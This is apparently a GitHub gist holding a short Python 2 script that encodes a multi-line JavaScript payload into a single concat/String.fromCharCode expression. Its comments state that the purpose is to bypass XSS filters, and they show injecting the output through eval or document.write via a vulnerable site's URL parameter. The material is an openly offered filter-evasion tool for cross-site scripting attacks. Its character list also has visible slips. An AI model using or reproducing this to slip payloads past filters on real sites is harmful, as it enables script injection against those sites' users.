Skip to content

Instantly share code, notes, and snippets.

@YasserGersy YasserGersy/Js2S.py
Last active Sep 14, 2019

Embed
What would you like to do?
javascript mutil lines payload into one line
#The main purpose is to bypass xss filters and execute multi lines payload
#write your payload to a file.txt
#run the script and pass the file as argument
# $python js2S.py file.txt
# copy the output and pass the output paylad to a javascript function document.write or eval ,, etc ,
#for example , http://vuln2-xss.com/?name=document.write(__output__)
#if any character from the following is filtered , remove it.
import sys,os
path=sys.argv[1]
lines=''
alph='abcdefghiijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWxyz0123456789'
if os.path.isfile(path):
lines=open(path,'r').read()
else:
lines=path
last=False
ndata="''.concat("
for l in lines:
if len(l)<1:
continue
legal=l in alph
asc=ord(l)
if legal and last:
ndata=ndata+l
elif legal and not last:
ndata=ndata+")).concat('"+l
elif last and not legal:
ndata=ndata+"').concat(String.fromCharCode("+str(asc)
else:
ndata=ndata+')).concat(String.fromCharCode('+str(asc)
last=legal
print "''"+ndata[12:]+'))'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.